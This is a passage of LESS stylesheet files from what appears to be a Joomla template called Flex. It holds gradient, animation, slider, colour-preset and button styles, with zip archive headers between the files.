background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #FFFFFF 0%, yellow 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF0000 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, color, screen, overlay, difference, difference, normal;
}
.luminosity-gemstones{
background: radial-gradient(100% 246.94% at 100% 0%, #fff 0%, #333 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #fff 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF2F2F 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%), #71f549;
background-blend-mode: overlay, screen, saturation, overlay, difference, saturation;
}
.summer-joy{
background: radial-gradient(100% 246.94% at 100% 0%, #fff 0%, transparent 100%), linear-gradient(121.18deg, orange 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #fff 74.04%), linear-gradient(341.1deg, #fff 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF2F2F 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, screen, saturation, overlay, difference, multiply;
}
.gentle-stars{
background: radial-gradient(100% 246.94% at 100% 0%, #fff 0%, transparent 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #fff 74.04%), linear-gradient(341.1deg, #fff 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF2F2F 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.warm-breeze{
background: radial-gradient(100% 246.94% at 100% 0%, #fff 0%, transparent 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, #FF003D 74.04%), linear-gradient(341.1deg, #fff 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF2F2F 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.orange-summet{
background: linear-gradient(129.96deg, #FF2F2F 10.43%, #000460 92.78%), radial-gradient(100% 246.94% at 100% 0%, #fff 0%, transparent 100%), linear-gradient(121.18deg, #1400FF 0.45%, #3A0000 100%), linear-gradient(154.03deg, #FF002E 0%, yellow 74.04%), linear-gradient(341.1deg, #B25BBA 7.52%, #1700A7 77.98%), linear-gradient(222.34deg, #0047FF 12.99%, #FF2F2F 87.21%), linear-gradient(150.76deg, #B7D500 15.35%, #2200AA 89.57%);
background-blend-mode: overlay, screen, saturation, overlay, difference, saturation, normal;
}
.descend-sun{
background: linear-gradient(45deg, #000850 0%, #000320 100%), radial-gradient(100% 225% at 100% 0%, #FF6928 0%, #000000 100%), linear-gradient(225deg, #FF7A00 0%, #000000 100%), linear-gradient(135deg, #CDFFEB 10%, #CDFFEB 35%, #009F9D 35%, #009F9D 60%, #07456F 60%, #07456F 67%, #0F0A3C 67%, #0F0A3C 100%);
background-blend-mode: screen, overlay, hard-light, normal;	
}
.vista-wallpaper{
background: linear-gradient(180deg, #FFFFFF 0%, #000000 100%), linear-gradient(229.79deg, #7534FF 0%, #000000 94.19%), radial-gradient(56.26% 101.79% at 50% 0%, #8F00FF 0%, #493500 100%), linear-gradient(96.19deg, #D5B300 3.37%, #500052 96.63%);
background-blend-mode: difference, difference, difference, normal;
}


// Animations
.animated-gradient{
	-webkit-animation: animatedgradient 50s ease infinite;
	animation: animatedgradient 50s ease infinite;
	-webkit-transform: translate3d(0,0,0);
	transform: translate3d(0,0,0);
}
.animated-gradient-2{
	-webkit-animation: animatedgradient2 50s ease infinite;
	animation: animatedgradient2 50s ease infinite;
	-webkit-transform: translate3d(0,0,0);
	transform: translate3d(0,0,0);
}
@-webkit-keyframes animatedgradient {
	0% {
		background-position: 0% 50%;
		background-size: 200% 200%;
	}
	25% {
		background-position: 100% 0%;
		background-size: 100% 100%;
	}
	50% {
		background-position: 0% 50%;
		background-size: 300% 600%;
	}
	75% {
		background-position: 100% 100%;
		background-size: 100% 200%;
	}
	100% {
		background-position: 0% 50%;
		background-size: 200% 200%;
	}
}


@keyframes animatedgradient {
	0% {
		background-position: 0% 50%;
		background-size: 200% 200%;
	}
	25% {
		background-position: 100% 0%;
		background-size: 100% 100%;
	}
	50% {
		background-position: 0% 50%;
		background-size: 200% 500%;
	}
	75% {
		background-position: 100% 100%;
		background-size: 100% 200%;
	}
	100% {
		background-position: 0% 50%;
		background-size: 200% 200%;
	}
}

@-webkit-keyframes animatedgradient2 {
	0% {
		background-position: 50% 50%;
		background-size: 100% 100%;
	}
	25% {
		background-position: 0% 100%;
		background-size: 100% 200%;
	}
	50% {
		background-position: 0% 50%;
		background-size: 200% 400%;
	}
	75% {
		background-position: 100% 0%;
		background-size: 200% 100%;
	}
	100% {
		background-position: 50% 50%;
		background-size: 100% 100%;
	}
}
@keyframes animatedgradient2 {
	0% {
		background-position: 50% 50%;
		background-size: 100% 100%;
	}
	25% {
		background-position: 0% 100%;
		background-size: 100% 200%;
	}
	50% {
		background-position: 0% 50%;
		background-size: 200% 400%;
	}
	75% {
		background-position: 100% 0%;
		background-size: 200% 100%;
	}
	100% {
		background-position: 50% 50%;
		background-size: 100% 100%;
	}
}

// STATIC Patterns

  .pattern--1 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, #DA6527 25%, transparent 26%);
    background-size: 20px 20px;
	background-repeat:repeat;
  }
  
  .pattern--2 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, transparent 25%, #A59B52 26%, #A59B52 33%, transparent 34%);
    background-size: 30px 30px;
	background-repeat:repeat;
  }
  
  .pattern--3 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, #6AA065 50%, transparent 55%);
    background-size: 30px 30px;
	background-repeat:repeat;
  }

  .pattern--4 {
    background-image:
      repeating-radial-gradient(circle at 60% 40%, #4A4989 5%, #4A4989 7%, transparent 12%);
    background-size: 50px 50px;
	background-repeat:repeat;
  }
  
  .pattern--5 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, transparent 15%, #983C38 21%, transparent 22%);
    background-size: 25px 50px;
	background-repeat:repeat;
  }

  .pattern--6 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, #299A60 20%, transparent 21%);
    background-size: 20px 40px;
	background-repeat:repeat;
  }
  
  .pattern--7 {
    background-color: #E4B11A;
    background-image:
      repeating-radial-gradient(circle at 50% 50%, #fff 18%, transparent 20%);
    background-size: 51px 51px;
	background-repeat:repeat;
  }
  
  .pattern--8 {
    background-image:
      repeating-radial-gradient(circle at 50% 50%, transparent 49%, #348a8e 50%, #348a8e 60%, transparent 61%);
    background-size: 45px 15px;
	background-repeat:repeat;
  }
/*
.body-innerwrapper {
	  //overflow:visible;
  }
  #digicom .col-md-4, .sppb-in-article{
	 position:sticky;
	 top:75px; 
  }
*/ 
PK!���]]flex/less/typography.lessnu&1i�.html-style span {
  color: #fff;
  padding: 0 5px;
}
ul.site-list {
  list-style: none;
  margin: 0;
  padding: 0;
  
	li {
	  margin-bottom: 10px;
	  
		i {
		  font-size: 14px;
		  margin-right: 10px;
		}
	}
}

/* UL "colors" showing 6 presets styles in Megamenu */
ul.colors{
	list-style: none;
	margin: 0;
	padding: 0;
	text-align:left;
	display:block;
	
	li {
		display:inline-table;
		
	
	
		width:20%;
		border:none;
		margin:0 1.7% 3%;
		padding:0;
		a {
			img {
				box-shadow:0 0 8px fade(black, 30%);
			}
			&:hover {
				img {
					box-shadow:0 0 0px 1px rgba(155,155,155,0.3);
				}
			}
		}
	}
}


.bullets {
	.li-circle {
	  list-style: disc;
	  padding-left:20px;
	}
	.li-ol {
	  list-style: decimal;
	  font-size: 14px;
	  
		li {
		  margin-bottom: 10px;
		}
	}
}

.dropcaps {
	.naked-drop {
		span {
			font-size: 77px;
			font-weight: 500;
			padding: 0 20px 0 0;
			float: left;
			display: block;
			line-height: 68px;
			margin:0;
		}
	}
	.full-drop {
		span {
			font-size:59px;
			color: #fff;
			font-weight: 500;
			padding: 6px 12px;
			border-radius: 3px;
			float: left;
			display: block;
			line-height: 50px;
			margin: 5px 12px 5px 0;
		}
	}
}
	blockquote {
		line-height:1.7;
		footer {
			line-height:2.5;
			cite {
				margin-left:3px;
			}
		}
	}

	
// divider 20px high
.break20 {
  display: block;
  width: 100%;
  height: 20px;
}PK!b����flex/less/lightslider.lessnu&1i�.entry-gallery {

	> ul.post-slides {
		padding:0;
		margin:0;
		border:0;
	}
}

.post-slides {

	overflow: hidden;
	height:0; /* hack for height on the first load */
	
	li {
		&.active {
			visibility: visible;
		}
	}
	
}


.lSSlideOuter {
    overflow: hidden;
    -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
	
	/* slider actions */
	.lSAction {
	    .transition(all 0.7s ease);
		opacity: 0;
		
		>a {
			display: block;
			top: 50%;
			width: 1px;
			height: 1px;
			cursor: pointer;
			position: absolute;
			z-index: 9;
			opacity: 0.7;
			.transition(all 0.35s ease);
	
			&:hover {
				opacity: 1;
			}
			&.disabled {
				pointer-events: none;
			}
		}
		>.lSPrev {
			left: 0;
			//right:auto;
			text-align:center;
			.translate(-50px, 0);
			
			> i {
				color:#fff;
				display: block;
				position: absolute;
				top: 50%;
				vertical-align:middle;
				text-align:center;
			}
		}
		>.lSNext {
			left: auto;
			right: 0;
			text-align:center;	
			.translate(50px, 0);	
				
			> i {
				color:#fff;
				display: block;
				position: absolute;
				top: 50%;
				vertical-align:middle;
				text-align:center;
				position: absolute;
				z-index: 9;
				right:0;		
			}
		}
	}

    &:hover {
		.lSAction {
			opacity: 1;
			
			.lSPrev,.lSNext {
				.translate(0, 0);
			}
		}
	}
	
	/* RTL */
	&.lSrtl {
		direction: rtl;
		
		.lightSlider {
			padding-right: 0;
			>* {
				float: right;
			}
		}
		.lSPager {
			padding-right: 0;
		}
		.lSGallery {
			li {
				float: right;
			}
		}
		.rightEnd {
			-webkit-animation: leftEnd 0.3s;
			animation: leftEnd 0.3s;
			position: relative;
		}
		.leftEnd {
			-webkit-animation: rightEnd 0.3s;
			animation: rightEnd 0.3s;
			position: relative;
		}
		
		.lSPrev {
			left: 0;
			right:auto;
			> i {
				left:0;
			}	
		}
		.lSNext {
			right: 0;
			left: auto;	
				
			> i {
				right:0;
			}
		}
	}	
}
.lightSlider:before, .lightSlider:after {
    content: " ";
    display: table;
}
.lightSlider {
    overflow: hidden;
	margin:0;
}
.lSSlideWrapper > .lightSlider:after {
    clear: both;
}

.lSSlideWrapper {
	max-width: 100%;
	overflow: hidden;
	position: relative;
	
	>.lightSlider {
		&:after {
			clear: both;
		}
	}
	.lightSlider {
		.transition(all 0.7s ease-in-out);
		-webkit-transition-property: -webkit-transform,height;
		-moz-transition-property: -moz-transform,height;
		transition-property: transform,height;
		.transition-timing-function(inherit);
		.transition-duration(inherit);	
		.translate(0px, 0px);
	}
	.lSFade {
		position: relative;
		>* {
			position: absolute;
			top: 0;
			left: 0;
			z-index: 1;
			margin-right: 0;
			width: 100%;
		}
		>*.active {
			z-index: 2;
		}
	}
	
}
.lSSlideWrapper.usingCss {
	.lSFade {
		>* {
		opacity: 0;	
		.transition-property(opacity);
		.transition-delay(0s);
		.transition-duration(inherit);
		.transition-timing-function(inherit);
		}
		>*.active {
			opacity: 1;
		}
	}
}
/* Pager */
.lSSlideOuter {
	.lSPager.lSpg {
		margin: 10px 0 0;
		padding: 0;
		text-align: center;
		
		>li {
			cursor: pointer;
			display: inline-block;
			padding: 0 5px;
			border:0;
			
			a {
				background-color: #ccc;
				border-radius: 30px;
				display: inline-block;
				height: 8px;
				overflow: hidden;
				text-indent: -999em;
				width: 8px;
				position: relative;
				z-index: 99;
				.transition(all 0.5s ease 0s);

			}
			&:hover {
				a {
					background-color: lighten(@major_color, 12%);
				}
			}
		}
		>li.active {
			a {
				background-color: @major_color;
			}
		}
	}
	.media {
		opacity: 0.8;
	}
	.media.active {
		opacity: 1;
	}
	
	
	/** Gallery */
	.lSPager.lSGallery {
		list-style: none outside none;
		padding-left: 0;
		margin: 0;
		overflow: hidden;
		
		.translate3d(0px, 0px, 0px);
		-webkit-transition-property: -webkit-transform;
		-moz-transition-property: -moz-transform;

		-webkit-touch-callout: none;
		-webkit-user-select: none;
		-khtml-user-select: none;
		-moz-user-select: none;
		-ms-user-select: none;
		user-select: none;
		li {
			overflow: hidden;
			-webkit-transition: border-radius 0.12s linear 0s 0.35s linear 0s;
			transition: border-radius 0.12s linear 0s 0.35s linear 0s;
			&:hover {
				border-radius: 5px;
			}
		}
		li.active {
			border-radius: 5px;
		}
		img {
			display: block;
			height: auto;
			max-width: 100%;
		}
		&:before {
			content: " ";
			display: table;
		}
		&:after {
			content: " ";
			display: table;
			clear: both;
		}
	}
	
	
	.lightSlider {
		padding-left: 0;
		list-style: none outside none;
		>* {
			float: left;
		}
	}
	.lSPager {
		padding-left: 0;
		list-style: none outside none;
	}
	.lSGallery {
		li {
			float: left;
		}
	}
	.rightEnd {
		-webkit-animation: rightEnd 0.3s;
		animation: rightEnd 0.3s;
		position: relative;
	}
	.leftEnd {
		-webkit-animation: leftEnd 0.3s;
		animation: leftEnd 0.3s;
		position: relative;
	}
}


.cS-hidden {
	height: 1px;
	opacity: 0;
	filter: alpha(opacity=0);
	overflow: hidden;
}


/* vertical */
.lSSlideOuter.vertical {
	position: relative;
	.lSGallery {
		position: absolute;
		right: 0;
		top: 0;
	}
	.lightSlider {
		>* {
			width: 100%;
			max-width: none;
		}
	}
	/* vertical controlls */
	.lSAction {
		>a {
			left: 50%;
			margin-left: -14px;
			margin-top: 0;
		}
		>.lSNext {
			background-position: 31px -31px;
			bottom: 10px;
			top: auto;
		}
		>.lSPrev {
			background-position: 0 -31px;
			bottom: auto;
			top: 10px;
		}
	}
	.rightEnd {
		-webkit-animation: topEnd 0.3s;
		animation: topEnd 0.3s;
		position: relative;
	}
	.leftEnd {
		-webkit-animation: bottomEnd 0.3s;
		animation: bottomEnd 0.3s;
		position: relative;
	}
}
.lSSlideOuter.vertical.noPager {
	padding-right: 0px;
}


/*  Grab cursor */
.lightSlider.lsGrab > * {
	cursor: -webkit-grab;
	cursor: -moz-grab;
	cursor: -o-grab;
	cursor: -ms-grab;
	cursor: grab;
}
.lightSlider.lsGrabbing > * {
	cursor: move;
	cursor: -webkit-grabbing;
	cursor: -moz-grabbing;
	cursor: -o-grabbing;
	cursor: -ms-grabbing;
	cursor: grabbing;
}

@-webkit-keyframes "rightEnd" {
	0% {
		left: 0;
	}
	50% {
		left: -15px;
	}
	100% {
		left: 0;
	}
}
@keyframes "rightEnd" {
	0% {
		left: 0;
	}
	50% {
		left: -15px;
	}
	100% {
		left: 0;
	}
}
@-webkit-keyframes "topEnd" {
	0% {
		top: 0;
	}
	50% {
		top: -15px;
	}
	100% {
		top: 0;
	}
}
@keyframes "topEnd" {
	0% {
		top: 0;
	}
	50% {
		top: -15px;
	}
	100% {
		top: 0;
	}
}
@-webkit-keyframes "leftEnd" {
	0% {
		left: 0;
	}
	50% {
		left: 15px;
	}
	100% {
		left: 0;
	}
}
@keyframes "leftEnd" {
	0% {
		left: 0;
	}
	50% {
		left: 15px;
	}
	100% {
		left: 0;
	}
}
@-webkit-keyframes "bottomEnd" {
	0% {
		bottom: 0;
	}
	50% {
		bottom: -15px;
	}
	100% {
		bottom: 0;
	}
}
@keyframes "bottomEnd" {
	0% {
		bottom: 0;
	}
	50% {
		bottom: -15px;
	}
	100% {
		bottom: 0;
	}
}
PK!E69����flex/less/presets.lessnu&1i�/**
 * Flex @package
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

@import 'variables';
@import 'mixins';

// Some rgba colors (transparency in %) - custom classes
.major_color_bckg-100 {background-color: @major_color;}
.major_color_bckg-90 {background-color: fade(@major_color, 90%);}
.major_color_bckg-80 {background-color: fade(@major_color, 80%);}
.major_color_bckg-70 {background-color: fade(@major_color, 70%);}
.major_color_bckg-60 {background-color: fade(@major_color, 60%);}
.major_color_bckg-50 {background-color: fade(@major_color, 50%);}
.major_color_bckg-40 {background-color: fade(@major_color, 40%);}
.major_color_bckg-30 {background-color: fade(@major_color, 30%);}
.major_color_bckg-20 {background-color: fade(@major_color, 20%);}
.major_color_bckg-10 {background-color: fade(@major_color, 10%);}

.black_bckg-90 {background-color: fade(black, 90%);}
.black_bckg-80 {background-color: fade(black, 80%);}
.black_bckg-70 {background-color: fade(black, 70%);}
.black_bckg-60 {background-color: fade(black, 60%);}
.black_bckg-50 {background-color: fade(black, 50%);}
.black_bckg-40 {background-color: fade(black, 40%)}
.black_bckg-30 {background-color: fade(black, 30%);}
.black_bckg-20 {background-color: fade(black, 20%);}
.black_bckg-10 {background-color: fade(black, 10%);}

.white_bckg-90 {background-color: fade(white, 90%);}
.white_bckg-80 {background-color: fade(white, 80%);}
.white_bckg-70 {background-color: fade(white, 70%);}
.white_bckg-60 {background-color: fade(white, 60%);}
.white_bckg-50 {background-color: fade(white, 50%);}
.white_bckg-40 {background-color: fade(white, 40%);}
.white_bckg-30 {background-color: fade(white, 30%);}
.white_bckg-20 {background-color: fade(white, 20%);}
.white_bckg-10 {background-color: fade(white, 10%);}

.black-inset-shadow-50 {box-shadow:inset 0 0 150px fade(black, 50%);}
.black-inset-shadow-40 {box-shadow:inset 0 0 150px fade(black, 40%);}
.black-inset-shadow-30 {box-shadow:inset 0 0 150px fade(black, 30%);}
.black-inset-shadow-20 {box-shadow:inset 0 0 150px fade(black, 20%);}
.black-inset-shadow-10 {box-shadow:inset 0 0 150px fade(black, 10%);}

.white-inset-shadow-50 {box-shadow:inset 0 0 150px fade(white, 50%);}
.white-inset-shadow-40 {box-shadow:inset 0 0 150px fade(white, 40%);}
.white-inset-shadow-30 {box-shadow:inset 0 0 150px fade(white, 30%);}
.white-inset-shadow-20 {box-shadow:inset 0 0 150px fade(white, 20%);}
.white-inset-shadow-10 {box-shadow:inset 0 0 150px fade(white, 10%);}

.major_color {color:@major_color!important;}
.white_color {color:#fff;}
.text_color {color:@text_color;}

.major_color-lighten-10 {color:lighten(@major_color, 10%);}
.major_color-lighten-20 {color:lighten(@major_color, 20%);}
.major_color-lighten-30 {color:lighten(@major_color, 30%);}

.gray-shadow-50 {box-shadow:0 0 50px fade(#555, 50%);}
.gray-shadow-40 {box-shadow:0 0 40px fade(gray, 40%);}
.gray-shadow-30 {box-shadow:0 0 30px fade(gray, 30%);}
.gray-shadow-20 {box-shadow:0 0 20px fade(gray, 30%);}
.gray-shadow-10 {box-shadow:0 0 10px fade(gray, 30%);}

.transparent {background:transparent;}

/* Headers */

#sp-header {
 
  &.onepage {
		.sp-megamenu-parent {
			li {
				&.active {
					a {
						color:@major_color;
						border-bottom: 2px solid @major_color;
					
					}
					&:first-child {
						>a {
						
							&.page-scroll {
								color:@major_color;
								border-bottom: 2px solid @major_color;
							}
						}
					}
				}
				
			}
			ul {
				li {	
					a {
						border-bottom-width: 0px!important;
						border-right: 2px solid transparent;
						border-radius:0!important;
						
						&:hover {
							color: @major_color;
							background:transparent;
						}
					}
					&.active {
						a {
							border-right: 2px solid @major_color;
				
						}
					}
				}
			}
		}	
	}
	
  	#sp-menu {
	  
	    // Megamenu 
		.sp-megamenu-parent {
			>li {
				&.current-item.active>a,
				&.sp-has-child.active>a {
					color:lighten(@major_color, 10%);
				}
			}
		
			.sp-dropdown {
				
				//List Item
				li.sp-menu-item { 
					
					&.current-item>a,
					&.current-item.active>a,
					&.current-item.active:hover>a,
					a:hover {
						color:#fff;
						background-color: @major_color;
						background-color: fade(@major_color, 80%);
					}
					  
					&.separator {
						>a,>a:hover {
							background:transparent!important;
							border-bottom:1px solid rgba(0,0,0,.15);
							box-shadow:0 1px 0px rgba(250,250,250,.15);
						}
					}
					&.separator.active {
						>a,>a:hover {
							background:transparent;
						}	
					}	 	 
				}
			}
		}  
	}
	
	
	// Top search
	.top-search-wrapper {
		.searchwrapper{
			box-shadow: 0 0 0 6px fade(@major_color, 50%);
		}
	}

	
		
	#cart-menu {

		padding:0;
		
		#cd-menu-trigger,
		.cd-cart {
			
			.empty_basket, 
			.items-added {
				background-color: @major_color;
			}
			
			&.menu-is-open {
				>i {
				   font-size:30px;
				}	
				
			}
			
		} 
		
			
		&.shopping-menu-is-open {
			
			#cd-menu-trigger,
			.cd-cart {
				
				>i {
				   background-color: fade(#333, 75%);
				}
				&.menu-is-open {
					.total_products {
						.transition(all .4s ease);
						right:27px;
						font-size: 11px;
						line-height: 18px;
						height: 18px;
						width: 18px;
					}
				}
			} 
		}
	}
	
	&.color {
		#sp-menu {
			.sp-megamenu-parent {
				.sp-dropdown {	
					.sp-dropdown-inner {
						background: fade(@major_color, 85%);
						
						li.sp-menu-item { 
							
							&.current-item>a,
							a:hover {
								background-color: darken(@major_color, 20%);
								background-color: fade(@text_color, 25%);
							}
						}
					}
				}
			}
		}
	}
}

.overflow-hidden {
	overflow-x:hidden;
}




// Accordion Vertical Menu module
.sp-module {	
	ul.accordion-menu {
		> li{
			.offcanvas-menu-toggler {
				
				.close-icon {
					color:@major_color;
				}

			}		
		}
		li.current > a {
			color:@major_color;
		}
	}
}	
.nav.menu li.current > a {
	color:@major_color;
}
	

.close-offcanvas {	
	&:hover {
		border: 1px solid @major_color;
		color:@major_color;
	}
}

.full-screen, .full-screen-off-canvas-ftop {
    .offcanvas-menu{

		margin-bottom:10vh;
		.search {
			input {
				height:44px;
			}
		}
		.flex-search {
			&:before {
				line-height:44px;
			}
		}
	
		ul li ul li.separator.deeper {
			.offcanvas-menu-toggler {
				padding:5px 15px;
				line-height:18px;
				
				.open-icon, .close-icon {
					font-size:16px;
				}
			}
		}					
	}
	
}
.slide-top-menu {
    .offcanvas-menu{
		margin-bottom:10vh;
		box-shadow:-1px 0 15px rgba(0,0,0,.3);

		.separator, .nav-header{
			color:lighten(@text_color, 70%);
		}				
	}
	
}
.new-look{
    .offcanvas-menu{
		box-shadow:-1px 0 15px rgba(0,0,0,.3);
        .sp-module {
            ul {
                >li {
					.separator, .nav-header{
						color:lighten(@text_color, 60%);
					}	
 
                    .offcanvas-menu-toggler{
                       
                        &:before{
                            background: @major_color none repeat scroll 0 0;
              				
                        }
                        &:after{
                            background: @major_color none repeat scroll 0 0;
                       
                        }
						 &.collapsed{
                            &:before{
                                background: #eee none repeat scroll 0 0;
                            }
                            &:after{
                                background: #eee none repeat scroll 0 0;
                            }
                        }
					}
					&.active {
						.offcanvas-menu-toggler{
						   
							&:before{
								background: @major_color none repeat scroll 0 0;
								
							}
							&:after{
								background: @major_color none repeat scroll 0 0;
						   
							}
						}
					}
				}
			}
		}
	}
}

// Anchor
a{
	color: @major_color;
	&:hover {
		color: darken(@major_color, 10%);
	}
}
.article-info {
	>dt,
	>dd{
		>i,
		>span.fa, >span.fas {
			color:lighten(@major_color, 10%);
		}
		.voting-symbol {
			span.star {
				color:lighten(@major_color, 10%);		
			}
		}
	
		.sp-rating {
			span.star:hover:before,
			span.star:hover ~ span.star:before {
				color:darken(@major_color, 5%);
			}
		}
		.ajax-loader:before {
			color:darken(@major_color, 10%);
		}
		
	}
}


// Off Canvas
#offcanvas-toggler {
	>i {
		color:lighten(@major_color, 10%);
		&:hover {
			color: @major_color;
		}
	}
}

.sp-pre-loader {
    background: @preloader_bg;
    
    // Clock loader
    .sp-loader-clock {
        border: 3px solid @preloader_tx;

        &:after{
            background-color: @preloader_tx;
        }

        &:before{
            background-color: @preloader_tx;
        }
    }
    // Circle Loader
    .sp-loader-circle{

        border: 4px solid fade(@preloader_tx, 40%);
        
        &:after{
			border-top-color: @preloader_tx;
		 
        }
    }
	
	
	// Flip Loader
	.loader-flip{
		
		  &:after{
			background-color: fade(@preloader_tx, 80%);
		}
		
	}
	
    // Bubble Loop Loader
    .sp-loader-bubble-loop{
        background-color: @preloader_tx;

        &:before{
            background-color: fade(@preloader_tx, 50%);          
        }
        &:after{
            background-color: fade(@preloader_tx, 50%);
        }
    }
    // Circle Loader Two
    .circle-two > span,
    .circle-two > span:before,
        .circle-two > span:after {
        border: 2px solid @preloader_tx;
    }

    // Audio Wave 2 Loader
    .wave-two li {
        background-color: @preloader_tx;
    }

    // Audio Wave Loader
    .sp-loader-audio-wave {
        background: linear-gradient(@preloader_tx, @preloader_tx) 0 50%, linear-gradient(@preloader_tx, @preloader_tx) 0.625em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.25em 50%, linear-gradient(@preloader_tx, @preloader_tx) 1.875em 50%, linear-gradient(@preloader_tx, @preloader_tx) 2.5em 50%;
    }

    // Loader With Logo
    .sp-loader-with-logo{
        .line{
            background: @preloader_tx;
        }
    }
}

//Buttons
.btn-primary,
.button,
.btn-readmore,
.sppb-btn-primary,
.vm-button-correct {
	border-color: darken(@major_color, 2%);
	background-color: @major_color;
	background-color: fade(@major_color, 90%);
	color:#fff;
	outline:0;

	&:hover,
	&:focus {
		border-color: darken(@major_color, 15%);
		background-color: darken(@major_color, 4%);
		color:#fff;
	}
	
	&.sppb-btn-outline {
	  border: 2px solid @major_color;
	  color: inherit;
	  background-color: transparent;
	}
	
	&.sppb-btn-round.focus,
	&.sppb-btn-round.active,
	&.sppb-btn-round:focus,
	&.sppb-btn-round:active,
	&.sppb-btn-outline:hover,
	&.sppb-btn-outline.focus,
	&.sppb-btn-outline.active,
	&.sppb-btn-outline:focus,
	&.sppb-btn-outline:active,
	&.open > .dropdown-toggle.sppb-btn-outline {
	  background-color: fade(@major_color, 90%)!important;
	  border-color: fade(black, 20%)!important;
	  color: #fff;
	  outline:0;
	}
	
	&.sppb-btn-3d {
	    border-bottom-color: fade(@text_color, 25%);
	}
	&.sppb-btn-3d:hover,
	&.sppb-btn-3d:focus {
	  background: fade(@major_color, 95%);
	  border-bottom-color: fade(black, 30%);
	}
	&.sppb-btn-3d:focus,
	&.sppb-btn-3d.focus,
	&.sppb-btn-3d:active,
	&.sppb-btn-3d.active,
	&.open > .dropdown-toggle.sppb-btn-3d  {
		//border-bottom: 2px solid fade(black, 30%);
		background: lighten (@major_color, 5%);
	}
}

.sppb-btn-default,
.btn.sppb-btn-default {
	background-color: fade(white, 75%);
	border-color: lighten (@text_color, 40%);
	color: lighten (@text_color, 40%);
	&:hover,
	&:focus {
		background-color: fade(white, 95%);
		border-color: @major_color;
		color: @major_color;
	}
	
	&.sppb-btn-outline {
	  border: 2px solid lighten(@text_color, 40%);
	  color: inherit;
	  background-color: transparent;
	}

	&.sppb-btn-outline:hover,
	&.sppb-btn-outline.focus,
	&.sppb-btn-outline.active,
	&.sppb-btn-outline:focus,
	&.sppb-btn-outline:active,
	&.open > .dropdown-toggle.sppb-btn-outline {
	  background-color: transparent!important;
	  color: darken (@major_color, 10%);
	  border: 2px solid @major_color!important;
	  box-shadow:none;
	}
	
	&.sppb-btn-3d {
		border-bottom-color: lighten(@text_color, 40%);
	}
	&.sppb-btn-3d:hover,
	&.sppb-btn-3d:focus{
	  background-color: transparent;
	  color: darken (@major_color, 10%);
	  border-bottom-color:@major_color;
	}
	
	&.sppb-btn-3d:active,
	&.sppb-btn-3d.active,
	&.open > .dropdown-toggle.sppb-btn-3d  {
		border-bottom: 2px solid @major_color;
		background-color: transparent;
	}
}
.btn-link, .sppb-btn-link {
	color:lighten(@major_color, 10%);
	&:hover,
	&:focus {
		color:@major_color;
		text-decoration: none;
	}
}
.btn-readmore {
	color:#fff;
		&:hover,
		&:focus {
			color:#fff;
		}
}
.btn-dark,.sppb-btn-dark {
	color:#fff;
	border-color: lighten(#333, 10%);
	background-color: fade(#333, 72%);
		&:hover,
		&:focus {
			color:#eee;
			border-color: #333;
			background-color: lighten(#333, 6%);
			background-color: fade(#333, 87%);
		}
		&.sppb-btn-outline {
			border-color: #333;
		}
		&.sppb-btn-outline:hover,
		&.sppb-btn-outline.focus,
		&.sppb-btn-outline.active,
		&.sppb-btn-outline:focus,
		&.sppb-btn-outline:active,
		&.open > .dropdown-toggle.sppb-btn-outline {
			color:#eee;
			border-color: #333;
			background-color: lighten(#444, 6%);
			background-color: fade(#333, 80%);
		}
		&.sppb-btn-3d,
		&.sppb-btn-3d:hover,
		&.sppb-btn-3d.focus,
		&.sppb-btn-3d:focus,
		&.sppb-btn-3d:active,
		&.sppb-btn-3d.active,
		&.open > .dropdown-toggle.sppb-btn-3d {
		  border-bottom-color: darken(#333, 5%);
		}
}
.btn-light,.sppb-btn-light {
	color:#f5f5f5;
	border-color:#f5f5f5;
	border-color:fade(white, 77%);
	background-color: fade(white, 5%);
		&:hover,
		&:focus {
			border-color: #fff;
			color:#fff;
			background-color: fade(white, 15%);
		}
	&.sppb-btn-outline {
		color:#f5f5f5;
		border-color:#f5f5f5;
		border-color:fade(white, 77%);
	}

	&.sppb-btn-outline:hover,
	&.sppb-btn-outline.focus,
	&.sppb-btn-outline:focus,
	&.sppb-btn-outline:active,
	&.sppb-btn-outline.active,
	&.open > .dropdown-toggle.sppb-btn-outline {
		border-color: #fff;
		color:#fff;
	}
		
	&.sppb-btn-3d {
